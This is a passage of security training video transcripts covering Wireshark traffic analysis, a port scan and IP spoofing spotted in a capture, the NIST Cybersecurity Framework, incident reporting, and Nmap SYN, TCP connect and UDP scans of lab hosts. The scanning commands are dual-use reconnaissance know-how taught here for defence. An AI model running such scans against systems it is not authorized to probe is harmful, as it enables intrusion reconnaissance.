things that perhaps shouldn't be on the network, protocols that shouldn't be in use. Or maybe rogue hosts that
were not there and now are showing up. So here in Wireshark, as I manually peruse through this packet
capture, I might come across things that look suspicious, such as IP addresses that don't normally fit the profile
of what is on our network.
[Video description begins] He scrolls through the table. [Video description ends]
For example, here I've got a source IP address of 1.1.1.1, where my subnet is 192.168.0.
[Video description begins] He points to the 192.168.0.20 value in the Source column header. [Video
description ends]
Now, that is not to say we shouldn't have any traffic outside of our subnet. Perhaps the subnet does allow
traffic from other locations. However, the other thing to watch out for is to filter when you find something that
you might think is suspicious. So for example, maybe here, a filter for 1.1.1.1.
[Video description begins] He types 1.1.1.1 in the Apply a display filter ... <Ctrl-/> search box. [Video
description ends]
Now, notice that when I try to type that into a percenter, I have a red bar, nothing happens. Well, that is
because I have to tie that value to a specific attribute. So for example, ip.addr equals 1.1.1.1.
[Video description begins] He alters the 1.1.1.1 value in the Apply a display filter ... <Ctrl-/> search box to
ip.addr==1.1.1.1. The No. column header includes the value: 1142. The Time column header includes the
value: 9.332956. The Source column header includes the value: 1.1.1.1. The Destination column header
includes the value: 192.168.0.5. The Protocol column header includes the value: TCP. The Length column
header includes the value: 58. The Info column header includes the value: 38282 -> 80 [SYN] Seq=0
Win=1024 Len=0 MSS=1460. The fifth part includes the expandable section: Ethernet II, Src:
IntelCor_c3:68:ba (18:56:80:c3:68:ba), Dst: HewlettP_67:13:0e (34:64:a9:67:13:0e). The sixth part
includes 0000 34 64 a9 67 13 0e 18 56 80 c3 68 ba 08 00 45 00 4d.g...V ..h...E.. [Video description ends]
So Wireshark has its own little syntax. Now we can see that we've filtered out the list and we're only seeing
1.1.1.1.
[Video description begins] He highlights the 1.1.1.1 value in the Source column header. The fifth part includes
the expandable sections: Ethernet II, Src: IntelCor_c3:68:ba (18:56:80:c3:68:ba), Dst: HewlettP_67:13:0e
(34:64:a9:67:13:0e), Internet Protocol Version 4, Src: 1.1.1.1, Dst: 192.168.0.5, and Transmission Control
Protocol, Src Port: 38282, Dst Port: 80, Seq: 0, Len: 0. The sixth part includes 0000 34 64 a9 67 13 0e 18 56
80 c3 68 ba 08 00 45 00 4d.g...V ..h...E. [Video description ends]
And if we select one of these packets, we can then start to break down the packet headers here.
[Video description begins] He expands the section: Ethernet II, Src: IntelCor_c3:68:ba (18:56:80:c3:68:ba),
Dst: HewlettP_67:13:0e (34:64:a9:67:13:0e). It contains the text, Destination: HewlettP_67:13:0e
(34:64:a9:67:13:0e) Source: IntelCor_c3:68:ba (18:56:80:c3:68:ba) and Type: IPv4 (0x0800). [Video
description ends]
Where, in the Ethernet header, we can see the source and destination MAC addresses, the hardware addresses,
the IP header, Internet Protocol.
[Video description begins] He expands the Internet Protocol Version 4, Src: 1.1.1.1, Dst: 192.168.0.5 section.
It includes the text: 0100 .... = Version: 4 .... 0101 = Header Length: 20 bytes (5), Flags: 0x0000 Time to live:
51 Protocol: TCP (6). [Video description ends]
Where we could see things like Time to live, the TTL value which is normally decremented by one each time
the transmission goes through a router, so it doesn't go around the Internet forever. There are other fields too in
the IP header, but here in the TCP header, we can see the Destination Port here is 80.
[Video description begins] He expands the expandable section, Transmission Control Protocol, Src Port:
38282, Dst Port: 80, Seq: 0, Len: 0. It includes the text, Destination Port: 80. [Video description ends]
Now what is suspicious here is from that same address, it looks like it's trying to hit TCP port 80, okay? It's
trying 192.168.0.2. Same with 0.3, trying to get to port 80, 0.5, port 80, okay.
[Video description begins] He points to the values, 192.168.0.2, 192.168.0.3, and 192.168.0.5, in the
Destination column header. [Video description ends]
What this is telling us is someone is conducting a port scan or some kind of a network scan against those hosts
for the same port number.
[Video description begins] He selects the value, 192.168.0.7, in the Destination column header. The fifth part
includes the expandable section: Ethernet II, Src: IntelCor_c3:68:ba (18:56:80:c3:68:ba), Dst:
Sonos_13:31:9c (94:9f:3e:13:31:9c). [Video description ends]
That is not normal in that small period of time to have the same source IP scanning for the same port number
or trying to make a connection to that port number. Something is going on here. And at the same time, we
might take a look at 1.1.1.1 and look at the source MAC address.
[Video description begins] He expands the section: Ethernet II, Src: IntelCor_c3:68:ba (18:56:80:c3:68:ba),
Dst: Sonos_13:31:9c (94:9f:3e:13:31:9c). It includes the text, Source: IntelCor_c3:68:ba
(18:56:80:c3:68:ba). [Video description ends]
Now, of course, it's easy to forge or spoof source IP addresses as well as MAC addresses.
[Video description begins] He points to the text, Source: IntelCor_c3:68:ba (18:56:80:c3:68:ba). [Video
description ends]
You'll see more forged IP addresses more often than you would see MAC addresses, but let's just take note of
this Mac address, 18:56:80:c3:68:ba. Okay, I'm going to keep that in mind for a second. Now as I start looking
through here and trying to draw correlations, notice here that down here where the destination that is been
probed 192.168.0.13.
[Video description begins] He selects the value, 192.168.0.13, in the Destination column header. The fifth part
includes the expandable section: Ethernet II, Src: IntelCor_c3:68:ba (18:56:80:c3:68:ba), Dst:
IntelCor_c3:68:ba(18:56:80:c3:68:ba). It includes the text, Destination: IntelCor_c3:68:ba
(18:56:80:c3:68:ba) and Source: IntelCor_c3:68:ba (18:56:80:c3:68:ba). [Video description ends]
[Video description begins] He highlights the text, Destination: IntelCor_c3:68:ba (18:56:80:c3:68:ba). [Video
description ends]
What is going on here? So what this is telling me is that we've got a network scan, and that the person
conducting the scan is attempting to hide their true identity with IP address spoofing.
[Video description begins] Topic title: Exercise: Auditing and Incident Response. The presenter is Dan
Lachance. [Video description ends]
In this exercise, the first thing you'll start with is to list three security auditing best practices. After that, you
will distinguish between vulnerability assessments and penetration testing, because those are not the same
things. Next, you'll explain how multi-factor authentication can enhance security. And finally, you'll list the
steps involved in creating an incident response plan. Now is a good time to pause the video, and to think about
each of these four bulleted items, and then afterwards you can come back to view the solutions.
[Video description begins] Solution. Security Auditing Best Practices. [Video description ends]
There are many security auditing best practices including the use of unique user accounts. By users having
their own log on credential set that aren't shared amongst other users, we have a way to track which users'
activities were performed by that person. And so therefore it's got accountability for actions. We can also
select event auditing that we want to audit. Instead of auditing all events, we can be much more judicious in
our choices so that we'll only be notified of items that actually have relevant impact. We can also use the
storage of audit logs on a central logging host. This way, if a device or a host containing audit logs itself is
compromised, and those logs are wiped or they're tampered with, well, we've got another central location
where we've got a copy of those. And often, that central logging host is very much hardened, so protected from
attack, and it's also stored on a protected network.
Vulnerability scanning is considered passive, because what we're doing is scanning a host or a range of IP
addresses or an entire subnet looking for weaknesses. However, when weaknesses are identified, that is as far
as it goes. Normally, vulnerability scanning won't cause a service disruption. Probably the worst thing that
could result from conducting a vulnerability scan would be setting off alarms. Because you're scanning devices
as a malicious user might do during the recognizance phase of hacking. So we can set off alarms, we should be
aware of that.
Penetration testing is a different beast altogether because it's considered active. Because it not only can identify
weaknesses, but it actually takes steps in an attempt to exploit those weaknesses. And depending on the
weakness in question, it can actually cause a service disruption for a specific system. So it's important then that
when we are conducting penetration testing, either through internal or external security auditors, that specific
pen test dates and times are set, so that we know when this is going to happen. You probably don't want a live,
active penetration test against a crucial business system during the height of when that system is required for
business productivity.
Multi-factor authentication, or MFA, uses at least two authentication categories such as something you know,
perhaps like a user name and a password. That is two separate items but they're both only one category
something you know, along with something you have. Maybe that would in the form of a smartphone where
you're being sent a unique code. And the combination of having the phone and that code sent to it, along with
the name and password, will allow you into his system. So multi-factor authentication then is certainly more
difficult to crack than if we were using single factor authentication, such as simply knowledge of the user name
and password.
Creating an indecent response plan begins with first identifying what it is that we want to be able to effectively
respond against in terms of realized threats against an asset. So we have to identify critical systems and/or data.
Then we have to look at what the likelihood is of threats against those systems and data actually occurring.
Then we need to identify and mitigate, ideally remove single points of failure. Then we need to assemble a
team that will be part of the incident response plan that will know their roles and responsibilities when certain
incidents occur. And finally, we can go ahead and create the plan. Incidents response planning is crucial in
today's technological environments which are drawing so vast and complex, and at the same time having so
many possible threats against them.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview [Video description ends]
Hi, I'm Glen Clarke. I've been a certified trainer for over 20 years, teaching organizations how to manage their
network environments and program applications with Microsoft technologies.
[Video description begins] Your host for this session is Glen E. Clarke. He is an IT trainer and
consultant. [Video description ends]
I'm also an award nominated author who's authored the CompTIA security plus certification study guide, the
CompTIA network plus certification study guide, and the best selling CompTIA plus certification all in one for
dummies. My focus over the last ten years has been teaching Microsoft certified courses, information security
courses, and networking courses such as Cisco ICND1 and ICND2. In this course, we're going to explore the
key concepts related to various types of security auditing, as well as audit strategies and auditing tools.
I'll start by identifying cyber security auditing key concepts, as well as the assessment and reporting processes.
I'll then demonstrate the Wireshark network security auditing tool, and the End Map perimeter security tool. I'll
then describe how to perform auditing for web applications and Windows and Linux security monitoring.
Next, I'll examine strategies for cyber security audits, and compare the pros and cons of various audit tools.
Lastly, I'll demonstrate how to use SS auditing tool to run an SS security system scan.
Upon completion of this video, you will be able to describe cyber security auditing concepts, the NIST
Cybersecurity Framework, and how they are used to improve infrastructure security.
Objectives
describe cyber security auditing concepts and the NIST Cybersecurity Framework and how they are
used to improve infrastructure security
[Video description begins] Topic title: Cyber Security Auditing. Your host for this session is Glen E. Clarke.
Screen title: Cyber Security Auditing Framework [Video description ends]
In this video, you will learn about cyber security auditing concepts. NIST has created a cyber security
framework whose focus is to manage cyber security risk. There are three components to the framework. First,
we have the framework core. The framework core is a set of activities, outcomes, and references that should be
followed by all critical infrastructures. It contains a set of industry standards, guidelines, and practices that
should be followed at all levels of the organization. The framework core is broken down into categories and
subcategories which represent discrete outcomes to be achieved.
We also have the framework implementation tiers. Which is focused on how an organization view cyber
security risk, and the processes to manage risk. The different tiers represent the organization's risk
management strategy and practices. And finally, we have the framework profile. The framework profile
represents the outcomes based on the business needs of the organization that have been selected from the set of
framework categories and subcategories. Organizations can create multiple framework profiles. For example,
they can have a current profile that shows their current cybersecurity posture against their target cybersecurity
posture by having a target profile.
[Video description begins] Screen title: Cyber Security Framework Core [Video description ends]
The framework core is divided into five functions that organizations should perform concurrently and
continuously to form an operational culture that addresses the dynamic cyber security risk. First, we have the
identity function, where the goal is to develop an organizational understanding to manage cyber security risk to
the systems, the people, the assets, and the data within the organization. Understanding the business context,
the resources that support critical functions, and the related cyber security risk enables an organization to focus
and prioritize its efforts consistent with its risk management strategy and business needs.
Examples of outcome categories within this function include asset management, governance, risk assessment,
and identifying the company risk management strategy. Next, we have the protect function, which is the stage
to develop and implement appropriate safeguards to ensure continuous delivery of critical services. The protect
function supports the ability to limit or contain the impact of a potential cybersecurity event. Examples of
outcome categories within this function include identity management and access control, awareness and
training, data security. Information protection processes and procedures, system maintenance, and protective
technology.
Then we have the detect function, where the goal of this function is to develop an implement appropriate
activities to identify when a cyber security event occurs. Examples of outcome categories within this function
include anomalies and events, security continuous monitoring and detection processes. Next we have the
respond function, in this function you develop and implement appropriate activities to take action when a cyber
security incident is detected.
This includes containing the impact of a potential cyber security incident. Examples of outcome categories
within this function include response planning, response analysis, mitigation, and improvements. Finally, we
have the recover function, where the goal is to develop and implement appropriate activities to restore the
capabilities of services that were affected by cyber security incident. Examples of outcome categories within
this function include recovery, planning, improvements, and also communications.
[Video description begins] Screen title: Cyber Security Framework Core Elements [Video description ends]
The cyber security framework core contains the following elements first, we have what we call a function. A
function is the highest level of a cyber security activity, and are identify, protect, detect, respond, and recover.
Each of the functions are divided into categories with each category representing a grouping of cyber security
outcomes. Example categories are asset management, identity management and access control, and detection
processes. Each category is then divided into subcategories which represent a specific technical outcome or
management outcome. Some examples of subcategories are external information systems are catalogued, data
at rest is protected, or notification from detection systems are investigated. The final element is what we call
informative references. Informative references are specifics, standards, guidelines, or practices that illustrate a
method to achieve an outcome.
[Video description begins] Screen title: Framework Implementation Tiers [Video description ends]
The framework implementation tiers provide a context on how the organization views cybersecurity risk and
the processes they have to mitigate that risk. The tiers range from tier 1 to tier 4, with each tier increasing the
sophistication in cybersecurity risk management practices. Tier 1 partial, involves a company who has no
formal approach to cybersecurity risk management practices, and manages risk in an ad hoc manner or reactive
manner. Tier 1 means there is little awareness of cybersecurity risk within the organization, and the
organization deals with risk management as needed. Tier 2, risk informed means that the risk management
practices are approved by management, but have not yet been implemented as policies.
There is awareness of cyber security risk, but an organization wide approach has not been implemented yet. At
tier 3 repeatable the organization has formal risk management practices approved and expressed as policies.
The organization’s cyber security practices are constantly updated based on the changing threat and technology
landscape. The company has a risk management program in place that is organization wide and includes risk
informed policies, processes and procedures. And finally, we have tier 4 adaptive. Tier 4 adaptive means that
the company adapts its cyber security practices based on lessons learned in predictions. The company is
constantly changing as threats and technologies change within the business. Organizations take their business
requirements, risk tolerance, and
[Video description begins] Screen title: Framework Profile [Video description ends]
resources and align those with the functions, categories, and subcategories in the framework to create a
framework profile. The goal of the profile is to act as a roadmap for reducing cyber security risk while keeping
in line with the business goals, regulatory requirements, industry best practices, and risk management
priorities. Organizations may choose to have multiple profiles. For example, there could be a profile created
that describes the current state for risk management within the company. And a profile that represent the
desired risk management goals for the company. In this scenario the current profile is used to identify areas
that need to be improved upon to reach the cyber security risk management goals of the organization. In this
video, you learned about cyber security auditing concepts.
Upon completion of this video, you will be able to describe how to perform a cyber security assessment.
Objectives
[Video description begins] Topic title: Cyber Security Assessment. Your host for this session is Glen E.
Clarke. [Video description ends]
In this video, you'll learn how to perform a cyber security assessment. The cyber security framework is
designed to help organizations identify, assess, and manage cyber security risk within the organization. The
framework is designed to be a complement to existing processes and be used as an overlay of the existing
processes to help identify gaps in the company's cyber security risk management practices.
The framework is designed to work with new cyber security programs or to integrate into existing programs to
improve the security posture of an organization. When assessing security, the framework is designed to be
applied throughout the life cycle phases of plan, design, build or buy, deploy, operate, and decommission. The
plan and design phases of the system life cycle should always account for cyber security goals within the
organization. The framework allows for the cyber security practices to evolve over the life cycle. The
important point to remember is that the cyber security design should always match the needs and risk tolerance
of the organization, as specified in the framework profile.
[Video description begins] Screen title: Cyber Security Practices [Video description ends]
When implementing the cyber security framework, there are a number of best practices that should be
followed. First, the framework should be used to compare an organization's current cyber security activities
with those outlined in the framework core. Remember to create a current profile, so you can determine how to
achieve the outcomes found in the core functions, categories, and subcategories.
Once the current profile is created, you can then determine the organization's compliance level with the
security goals and risk tolerance level of the organization. Once the current profile is created, the organization
can develop an action plan to improve the existing cyber security practices and reduce cyber security risk. And
finally, the company may find that after comparing the current profile with their desired cyber security goals
and risk tolerance level, that they're over investing in resources in a specific area. The organization can use this
information to reprioritize resources and adjust as needed.
[Video description begins] Screen title: Establishing a Cyber Security Program [Video description ends]
If an organization does not have a security program in place, they can follow the steps to create a security
program. If a security program does exist, the company can use these steps to improve the security program
and should do so on a reoccurring basis. Step one is to prioritize and scope. In this step, the organization
identifies its business goals and high level organizational priorities. After understanding its goals, the
organization can make strategic decisions regarding cyber security implementations. If your organization has
different lines of business, you can create a different profile to be achieved with each line of business.
Step two is to orient, after determine the scope of the cyber security program, the organization identifies the
systems and assets, regulatory requirements, and overall risk approach. After identifying the systems and
assets, the company can identify threats and vulnerabilities against each of those systems and assets. Step three
is to create a current profile. At this point, the organization develops a current profile by specifying the
category and sub category outcomes from the framework core that are currently in place. Next, we have step
four conduct a risk assessment. The next step is to conduct a risk assessment with the risk assessment, you
analyze the operational environment, and identify the likelihood of a cyber security event, and the impact the
event would have if it occurred.
Step five of establishing a cyber security program is to create a target profile. The target profile focuses on the
assessment of the framework categories and subcategories which describe the organization's desired cyber
security outcomes. It's important to note that the framework is designed to be adaptive. So if the company
wants to develop their own categories and subcategories, they can. Next, you want to determine, analyze, and
prioritize gaps. At this phase, you compare the current profile to the target profile that determine gaps in the
cyber security practices. This helps you create a prioritize action plan to address gaps in achieving the
outcomes of the target profile.
You would then determine the resources and funding necessary to address the gaps in cyber security practices.
Step seven is to implement the action plan. In this phase, you determine which actions to take to address the
gaps and adjust the current cyber security practices in order to achieve the target profile. The framework gives
informative references in regards to the categories and subcategories, but know that companies should identify
any standards, guidelines, and practices that work best for their organization.
[Video description begins] Screen title: Self-Assessing Cyber Security Risk [Video description ends]
In order to be successful at self-assessing cyber security risk, an organization must have a clear understanding
of its objectives and how those objectives relate to the cyber security outcomes. You can perform a self-
assessment of the effectiveness of the cyber security framework outcomes by, first, making a decision on the
target implementation tiers.
Then evaluating the organization's approach to risk management by determining the current implementation
tiers. Create target profiles to prioritize the framework outcomes. Determine the steps needed to take in order
to achieve the desired cyber security outcomes by comparing the current profile against the target profile. And
finally, determine the degree of implementation for controls or technical guidance listed in the informative
references. In this video, you learned about performing a security assessment.
After completing this video, you will be able to describe audit review, analysis, and reporting.
Objectives
[Video description begins] Topic title: Cyber Security Reporting. Your host for this session is Glen E.
Clarke. [Video description ends]
In this video, you will learn about cyber security reporting and incident response. Cyber security reporting is
an important aspect of your security program and should include auditing results from monitoring activities.
Such as user account usage, remote access, wireless connectivity, mobile device connections, changes to
configuration settings and usage of maintenance and administrative tools. When incorporating cyber security
reporting into your security program, you should first review the necessary audit records.
This means that you will need to ensure that auditing is enabled in any environments where you would like to
audit records made. You should also decide on the type of events to audit and whether you care about the
success or failure of those events. For example, do you care to know about the success of group management
or the fail of group management? After collecting the audited data, you'll need to analyze the audit records for
anomalies that could represent a security incident. When analyzing audit data, you're looking at the types of
event, the dates and time, the user account that was used, the computer name that was used, and any file
information.
You should also correlate the audit data with other audit information such as physical access logs. You will
then report on the findings. Auditing can gather a lot of information. So when reporting on the findings, you
should filter the information out to only contain necessary data in the report.
[Video description begins] Screen title: Incident Reporting [Video description ends]
Organization should have a formal incident reporting policy that clearly specifies when security incidents
should be reported and who they should be reported to. Company should be clear in regards to requiring
personnel to report suspected security incidents within the time period specified within the policy. For
example, a company may require that security incidents be reported within two hours of their discovery, who
to report the security incidents to. For example, companies may require that security incidents are reported to
the security officer.
[Video description begins] Screen title: Incident Reporting Controls [Video description ends]
There are number of best practices as it relates to incident reporting controls. First, organizations should look
to use technologies or solutions that help automate the reporting of security incidents. If a full automated
solution cannot be found to suit your needs, look to a system that will help you report the incidents. When
reporting on a security incident, be sure to report on the vulnerability that helped the security incident occur.
For example, if the security incident involved a hacker gaining access to a system through a vulnerable piece
of software, include in the report the vulnerability, and potentially the fix to that vulnerability, if one exists.
The organization should report the security incident to other organizations in the supply chain of the
information system that's involved in the security incident or its components.
[Video description begins] Screen title: Incident Response Plan Guidelines [Video description ends]
It is imperative that organizations implement an Incident Response Plan to ensure that all personnel know the
responsibilities during a security incident. The Incident Response Plan provides the organization with a
roadmap for incident response tasks that need to be performed during a security incident. It also describes the
existing incident response capabilities of the organization. And outlines at a high level, how incident response
integrates into the overall security program for the organization.
The Incident Response Plan should be designed to meet the unique requirements of the organization which
relates to the organization's mission size, structure and the functions. The Incident Response Plan should also
define what security incidents are reportable. Personnel should understand what incidents to report and who to
report them to. The Incident Response Plan should also provide metrics for measuring the incident response
capabilities within the organization. It should identify and define the resources and management support that
are needed to effectively maintain and evolve incident response within the organization. And finally, the
Incident Response Plan should be reviewed and approved by the security officer. In this video, you learned
about cyber security reporting and incident response.
[Video description begins] Topic title: Network Security Auditing. Your host for this session is Glen E.
Clarke. [Video description ends]
In this demonstration, we'll take a look at how to use Wireshark, a tool that you can use to analyze network
traffic, either to help troubleshoot the network or look for suspicious network traffic. Now before we get
started with the demo, I first want to mention that you can download Wireshark from the www.wireshark.org
website. And you can install it on your system. They have different downloads for different platforms. So for
instance, you can install it on Linux, Windows, or the Mac itself.
They also have a portables version that you can use as well. So I've already got it installed on the system. I am
using my Kali Linux system. So to launch Wireshark from my Kali Linux system, I go up to Applications and
down to Sniffing and Spoofing. So what's kind of nice here about Kali Linux is they have a number of security
tools built in and they have them organized by the type of tool. So Wireshark is a packet sniffer. It’ll capture
and analyze network traffic for us. And you can see over here on the right, I have many different types of
sniffing and spoofing tools. So I’m going to launch Wireshark.
[Video description begins] The Wireshark interface displays on the screen. It contains a search field
underneath the heading "Capture". Below the field is a list of network interfaces including "eth0", "any", and
"Loopback: lo". [Video description ends]
Once Wireshark is launched, the first thing that you'll notice is that you have a kind of a Welcome to
Wireshark page. And I have a list here of network interfaces. And what I love here is they're showing you kind
of live traffic on the network to help you identify which network interfaces are actually seeing traffic right
now. So what you do is pick the interface that you want to monitor traffic from. In my case, it is eth0.
If I hover over it, you can see the IP address of the interface. So if you're not quite sure what interface you
actually want to use but you know the IP address of your system, you could hover over each of these. And a
little tool tip will pop up and give you the IP address information. So to start capturing on interface, what you
do is you should double click on that interface. So I double clicked on the eth0 interface. You can see up top
here that I have a stop button and that's how I'm going to stop capturing but I'm currently capturing traffic.
[Video description begins] The host points to the red box in the "Capturing from eth0" window. The Packet
List Pane displays various packets underneath the following column headers: No., Time, Source, Destination,
Protocol, Length, and Info. [Video description ends]
And you can see up here in the title where it says Capturing from eth0, and you can actually see the packets
getting collected here. So there's a number of our broadcast messages. Now what I'm going to do is I'm just
going to move that to the right or shrink it down and move it to the right. Because just for this demo, I set up a
little website to type in credit card number.
[Video description begins] He opens the Mozilla Firefox web browser. [Video description ends]
And basically, what I want to do is capture that and then show you how I can find that very easily. So I'm
going to navigate to the website. The website is 192.168.67.130. And here's my little Welcome to the Website
Enter the credit card number. So I'm going to do 998877 is my credit card number. And I hit the little Buy
button, and it submits the credit card number up to the server. It processes the request and says hey, we're
going to go and build that credit card number. So there's an example of some traffic that I want to be able to
capture. So I'm going to close that down and go back to my packet capture. And first thing I'm going to do here
is I'm going to stop capturing traffic.
[Video description begins] He clicks the red box. [Video description ends]
Now, one of the things about network monitoring is that you're capturing a lot of packets. And there's a lot of
traffic here that I actually don't want to work with right now. So you can see there's all these broadcast packets,
right? If I scroll down, we'll start seeing all the different packets from all kinds of different systems on the
network. So the first thing that I like to do is apply a filter for the type of traffic that I would like to see.
So what's kind of nice is you can capture everything and then filter off for the stuff that you want to look for.
So right now, I care about monitoring traffic that's between the .130 system and the .131. So what you can do
is, you can come up top here and you can type out an expression that applies what we call display filter. A
display filter means filter out what we see, versus a capture filter, filter out what gets captured. So I've captured
everything but I want to filter it, what's being displayed. And here you write an expression. So I'm going to do
ip.host, so ip.host there's intellisense where it kind of pops up. = 192.168.67.130 and ip.host = 192.168.67.131.
[Video description begins] He types the following text in the filter toolbar: ip.host == 192.168.67.130 and
ip.host == 192.168.67.131. [Video description ends]
Now, the reason why I'm choosing these two, and I hit Enter there. The reason why I'm choosing these two IP
addresses is because my Kali Linux system is the 131, and the website that I was on was 130. So I wanted to
see traffic where the packets are actually from both of these IPs. So you can see here we have the source IP
addresses 131, destination is 130, 130 to 131. So I'm only seeing traffic where these two systems are involved
in the traffic, which is very useful.
Now, a quick little tour of the interface, so there's kind of three main panes in Wireshark. The top pane here is
where the packets are displayed. So I can see each of the different packets and I can highlight each packet if I
wanted to, going down through. And so this is kind of a main area that I interact with. When you select a
packet, it shows the packet details in this middle pane here.
[Video description begins] He points to the Packet Details Pane. [Video description ends]
And the packet details are organized by these different sections to make it easy to look at the information.
Now, the packet details are also in hexadecimal format
[Video description begins] He points at the Packet Byte Pane. [Video description ends]
and also in ASCII format down here. So this is what we call the hex pane, right? Now, just to kind of show you
that the hex pane will change as I'm highlighting data, so if I highlight the different packets, notice this hex
pane changing, right? So that's the hexadecimal information. So we don't really understand or I don't
understand how to read this hex pane.
So what the creators of Wireshark have done is they've interpreted this hexadecimal data to create the detailed
pane for us to look at, right? So it's a little bit easier to look at and read the information from the detailed pane.
So the first thing I do when using a tool like Wireshark is I focus on the top pane where the packets are listed.
And what I do is I look at the protocol column. So notice that we do have the packet number, the time since the
capture started, the source IP address of the packet.
So this packet came from 1.131 and its destination IP is set to 130. You can see the protocol, you can see the
size of the packet. And I love this Info column. The Info column is information that is very useful to know
about the packet. That information that's in this Info column, you could actually locate down bottom here. But
what they do is they take kind of some key information and I throw it in that Info column. And I'll show you
what I mean here in a second. But the idea is as you'll read through this, a lot of times I'll look at the protocol
first. Because when you're analysing traffic, you have an idea what you're looking for.
So our focus is to find that credit card number that was submitted. So that's going to be HTTP traffic. So we'll
look for the HTTP protocol. But before we do that, I just want to give you a quick little overview of the
conversation that we've captured. So notice that the protocol is TCP. And in the info, what I look for here is,
they have a SYN flag. Then the next packet is the SYN, ACK In the next packet is the ACK. So what this is?
Is this is the three-way handshake the TCP three-way handshake when I visited the website, right? So a TCP
three-way handshake occurred over port 80. Once the handshake completes, then the protocol switches to
HTTP because now I'm talking to the web server, right? Now, let's go to the packet that I want to analyze here,
and that is the credit card getting posted.
So I'm not interested in this HTTP GET request, because that means I'm requesting the download from the web
server. I'm looking for somebody uploading data. So I'm looking for an HTTP packet that has a POST request,
see that POST request there? So I select that. And the idea is once you find a packet of interest, then you start
looking at this details pane.
[Video description begins] The Packet details pane currently displays the following expandable headers:
Frame 187, Ethernet II, Src, Internet Protocol Version 4, Src, Transmission Control Protocol, Src Port,
Hypertext Transfer Protocol, and HTML Form URL Encoded. [Video description ends]
And I can see the frame details. If I expand that out, I can see things like the time that the packet occurred, the
size of the packet. If I collapse that down, I've got my Ethernet header, the Ethernet header is your layer two
information. So this contains the MAC address, so I can see the source MAC address and the destination MAC
address. It just a little heads up here. Notice that when I select the source MAC address here, I can see the
MAC address 00:0c:29:f4:a4:af. But noticed that when I select that down bottom in the hex pane, it also shows
the same. It highlights the way that data is in the hex pane.
So if I go and highlight the destination MAC address, notice that it changed the highlighted area within the hex
pane. So it's kind of nice. So that's where I can locate the source and destination MAC address. So if I'm
analyzing a security incident, I would record this information. Then we've got the IP header and the IP header
shows things like your source and destination IP address. So if I look for that here, there's our source and
destination IP address. So again, you know I'm kind of analyzing the traffic and recording that information.
Then we've got our TCP header. And in the TCP header, you'll see all the TCP data, such as the source and
destination port. So the source port used by the web browser was 38,190.
Destination port is port 80 because it's hidden to a web server. And then down below that, you'll have what we
call the application data. And the application data is in this case, it's an HTTP packet. So I do see an HTML
section and when I expand that out, what I want you to notice is there's the credit card number txtCreditCard is
998877, right? So I can select that. Notice that it highlighted that area down in the hex pane and also in the
ASCII pane. Notice the ASCII window down here, it's highlighted it. So let me go back and highlight that
there. So that's kind of the idea of using Wireshark as a network analyzer and to help you analyze network
traffic and hopefully discover any kind of security incidents that may occur.
[Video description begins] Topic title: Perimeter Security Auditing. Your host for this session is Glen E.
Clarke. [Video description ends]
In this demonstration, we'll take a look at how to use Nmap, a security scanner that you can download from
nmap.org. Or it's available in a lot of Linux platforms by default. Nmap can be used as a port scanner that's
used to identify systems on the network and the ports that those systems have open and potentially the software
that's running on those ports. So it's a great tool, as a network analyst, that I can use to scan my own network
and discover what systems exist and what ports are open on those systems.
But also, as a security professional you know performing, let's say a penetration test, I can use this tool to help
discover systems that might be vulnerable on the network. So let's take a look at using Nmap as a port scanner.
So the first thing I'm going to do on my Kali Linux system is I'm going to go into a terminal session. So I hit
the little Terminal button over here.
[Video description begins] An instance of Windows Terminal titled "root@kali:~" displays. The command
prompt in the interface reads: "root@kali:~#" [Video description ends]
And let me just size this window out, so that we can see everything pretty well. So the first thing is that Nmap
is used to perform a number of different scans. So I can do an nmap -s(lowercase), which means scan. Now,
there's different types of scans, so the next character specifies the type of scan. So for instance, I can do what
we call a SYN scan, which is very common. What a SYN scan is, is that it scans the ports on a system. But it
only does a partial three-way handshake. It doesn't do a full three-way handshake. Versus a TCP connect scan,
which I can use with a capital T. It does a full three-way handshake with each of the ports.
And the concept of the TCP three-way handshake or TCP connect scan I should say, is that if the tool can do a
full three-way handshake with the port and make a connection, then the port must be open, so it's considered
very reliable. When the results come back, you can rely on those results because it established a full-fledged
connection. Versus a SYN scan doesn't do a full three-way handshake. So in theory, it's not as reliable as a
TCP connect scan. But keep in mind, today's day and age, it's fairly reliable. Now the benefit of doing the SYN
scan is that you are generating less traffic, right? Because you're not doing the full three-way handshake.
A lot of security professionals will use SYN scans a lot, over maybe the TCP connect scan. But both are good,
the results come back the same. So after that, you specify the IP address. So you can specify 192.168.67.130 as
the Windows machine I want to do a port scan on. So notice that you can specify the IP address of a single
system or what's kind of nice, you could actually do the whole network, so you could do 192.168.67.0/24. So if
you know the network range and how to specify the network range in the CIDR notation, you can do that, so
that's what I'll do first. I am going to focus on the 130 system, but let me first show you that I can do a full scan
across the network.
[Video description begins] He enters the following command: nmap -sS 192.168.67.0/24 [Video description
ends]
So it will take a few minutes here. It won't take too long, because there's not a lot of systems. It should pick up
on the 130 system at least, so it finished the scan. And if I scroll up and take a look at the results. So it did pick
up on 168.67.1, which is our router. It picked up on 67.2, and there's the 67.130. Now notice that the 67.1
system, it has a few ports that it found open. The 67.2, even less ports, but when I scroll down and take a look
at that 67.130, there's quite a few ports open on 67.130. So we can see that the telnet port is open, the web port.
So there's a web server running on that system. We can see that it's got the 135, 139, and 445, so it's probably a
Microsoft Windows machine. Because those are ports found on Windows boxes. It does have port 3389, which
is the RDP port, so RDP is enabled on it, right? So there's quite a few ports that are open on that system, so
that's an important target there. So that was the whole network scan. Now for the rest of the examples, I am
going to focus on just that 130. Just to cut down on the output, so I don't have to scroll through the screen.
[Video description begins] He clears the screen and then enters the following command: nmap -sS
192.168.67.130 [Video description ends]
So I can do a SYN scan and notice that, of just 130, notice that it comes back and says okay, here's the results
for 130. The host is up and running, so what happens is Nmap does a ping first to see if the system is up and
running. And if it is, then it does the port scan. And then here's our different ports that are open. Now that's a
TCP port scan, right, SYN scan. We can also do, I'm just going to use my up arrow here, just to show you the
different types of scans. I'll do an sT, remember, that's a TCP connect scan.
[Video description begins] He clears the screen and then enters the following command: nmap -sT
192.168.67.130 [Video description ends]
And again, the results aren't really any different. It's just underneath the scenes, how the scan was performed,
right? So that did a three-way handshake with each port. Now, let's do UDP port, so if I want to do a UDP
scan, that's a -sU, so -s means scan. The next capital character specifies the type of scan, so this is going to be a
UDP port scan.
[Video description begins] He clears the screen and then enters the following command: nmap -sU
192.168.67.130 [Video description ends]
